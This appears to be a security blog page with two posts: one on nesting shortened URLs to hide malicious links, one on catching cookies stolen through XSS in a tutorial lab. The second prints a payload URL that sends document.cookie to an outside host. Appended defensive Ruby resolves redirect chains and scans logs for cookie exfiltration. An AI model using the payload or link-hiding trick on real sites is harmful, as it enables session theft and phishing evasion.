Showing posts with label xss. Show all posts

Friday, February 11, 2011

Russian Doll URL Shortening

Attackers have been hiding malicious URLs using shortening services like TinyURL or bit.ly for some time now. Some smarter folks, however, have plugins that automatically resolve shortened URLs for them.

For a little extra oomph, what if the attacker shortened an already shortened URL? I wonder how many of these tools are prepared to unravel a chain of shortened URLs.

I haven't seen this technique yet, so hopefully I'm the inventor and everyone will call it "Russian Dolling."

p.s. On an only slightly related note, does anyone know of any services that let you edit the target URL afterwards? If so, you could create a loop in shortened URLs. That would be awesome.

UPDATE:
Diogo Mónica notified me that he has seen such attacks in the wild, and there are tools that can handle it. While not surprising in the least, I must admit I am still a little disappointed it won't be named Russian Dolling. Alas.

Diogo also pointed out that loops are possible using services such as ow.ly. Such as this one. Don't use bit.ly though, because it will warn you of encapsulation. Be sure to check out Diogo's blog if you get the chance, it's awesome.
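The chain-unravelling the post wonders about, as an added example that is not the post's own code and not any real plugin's: a Ruby resolver that follows redirects one hop at a time, gives up after a hop limit, and stops as soon as a URL repeats, so a shortener loop like the ow.ly one mentioned in the update is reported instead of spinning forever. The redirect table, hostnames and the `fetch_location` callable are constructed for the example; in real use that callable would wrap a Net::HTTP request that reads the Location header without following it.

```ruby
require 'uri'

# Outcome of following a redirect chain: where we ended up, every URL seen
# on the way, and why we stopped (:resolved, :loop or :too_deep).
Resolution = Struct.new(:final_url, :chain, :status)

# Follow redirects hop by hop. `fetch_location` takes a URL string and returns
# the Location header a GET would receive, or nil when the URL is a final page.
# A visited set catches loops; max_hops bounds the work even without a loop.
def unravel(start_url, fetch_location, max_hops: 10)
  chain = [start_url]
  seen = { start_url => true }
  current = start_url
  max_hops.times do
    nxt = fetch_location.call(current)
    return Resolution.new(current, chain, :resolved) if nxt.nil?
    nxt = URI.join(current, nxt).to_s # Location may be relative
    return Resolution.new(nxt, chain, :loop) if seen[nxt]
    seen[nxt] = true
    chain << nxt
    current = nxt
  end
  Resolution.new(current, chain, :too_deep)
end

# Constructed redirect table standing in for real shortener responses
# (hypothetical hosts; nothing here is contacted over the network).
SAMPLE_REDIRECTS = {
  'http://tinyurl.example/a1'  => 'http://bit.example/b2',
  'http://bit.example/b2'      => 'http://owly.example/c3',
  'http://owly.example/c3'     => 'https://final.example/page',
  'http://owly.example/loop1'  => 'http://owly.example/loop2',
  'http://owly.example/loop2'  => 'http://owly.example/loop1',
}.freeze

SAMPLE_FETCH = ->(url) { SAMPLE_REDIRECTS[url] }

if __FILE__ == $PROGRAM_NAME
  %w[http://tinyurl.example/a1 http://owly.example/loop1].each do |u|
    r = unravel(u, SAMPLE_FETCH)
    puts "#{u} -> #{r.final_url} (#{r.status}, #{r.chain.length} URLs seen)"
  end
end
```

A resolver used on untrusted links should also refuse to fetch a Location that points at a private or link-local address, since an attacker controls every hop in the chain; that check belongs inside whatever `fetch_location` you plug in.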

Sunday, November 14, 2010

Simple Ruby Cookie Catcher

So I've been playing around with some XSS the last couple days on Google Code University's web security tutorial and it's pretty awesome. However, injecting <script>alert("xss!")</script> isn't quite as fun as actually stealing data.

So I did a quick Google search for simple cookie catching scripts, only they were pretty much all in PHP. So I decided to whip up something quick in Ruby. And so, without further ado...



There you go. The XSS script needs to make the browser issue an HTTP GET request to the Ruby server; the URL can look like anything, just include a '?' followed by a query string containing the desired data (like a cookie). The URL I build looks like:
"http://blahblah.com:8080/hai?"+document.cookie

You can pass as much data in the query string as you'd like, and all the results are written out to cookiejar.txt.
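Seen from the other side of the wire, a request built like the one above leaves a recognisable trace in the target site's access log: a query string that carries semicolon-separated name=value pairs (the shape of document.cookie) or a known session cookie name. As an added example that is not the post's own code, here is a Ruby scanner over Apache/nginx combined-format log lines that flags such requests; the log lines, IPs and the cookie-name list are constructed for the example and should be extended with your own applications' cookie names.

```ruby
require 'cgi'

# Combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<path>\S+) \S+" (?<status>\d{3}) (?<size>\S+)/

# Cookie names that have no business in a query string (constructed starter list).
SESSION_COOKIE_NAMES = %w[PHPSESSID JSESSIONID ASP.NET_SessionId session sessionid
                          _session_id connect.sid].freeze

# Return the query part of a request path, percent-decoded twice so that
# both browser-encoded and attacker-double-encoded payloads read the same.
def decoded_query(path)
  query = path.split('?', 2)[1]
  return nil if query.nil?
  CGI.unescape(CGI.unescape(query))
end

# True when the query string looks like a dumped cookie jar.
def cookie_exfil?(path)
  query = decoded_query(path)
  return false if query.nil?
  pairs = query.split(/;\s*/).map { |pair| pair.split('=', 2) }
  names = pairs.map(&:first).compact.map(&:strip)
  return true if names.any? { |n| SESSION_COOKIE_NAMES.include?(n) }
  # Two or more semicolon-separated name=value pairs is document.cookie's shape;
  # a single pair is what ordinary query strings look like, so it is not flagged.
  pairs.count { |pair| pair.length == 2 && !pair[0].empty? } >= 2
end

# Scan log lines and return one hash per suspicious request.
def scan_log(lines)
  lines.map do |line|
    m = LOG_LINE.match(line)
    next if m.nil? || !cookie_exfil?(m[:path])
    { ip: m[:ip], time: m[:time], path: m[:path] }
  end.compact
end

# Constructed sample log: lines 1 and 3 carry cookie-shaped query strings.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [14/Nov/2010:10:01:02 +0000] "GET /hai?PHPSESSID=abc123;%20theme=dark HTTP/1.1" 200 12
  203.0.113.7 - - [14/Nov/2010:10:01:05 +0000] "GET /search?q=ruby HTTP/1.1" 200 5120
  203.0.113.9 - - [14/Nov/2010:10:01:09 +0000] "GET /hai?_session_id%3Dfe12%3B%20lang%3Den HTTP/1.1" 200 12
LOG

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG.lines).each do |hit|
    puts "possible cookie exfiltration from #{hit[:ip]} at #{hit[:time]}: #{hit[:path]}"
  end
end
```

Detection is the second line of defence; the first is marking session cookies HttpOnly, which keeps them out of document.cookie entirely so an injected script has nothing of value to put in that query string.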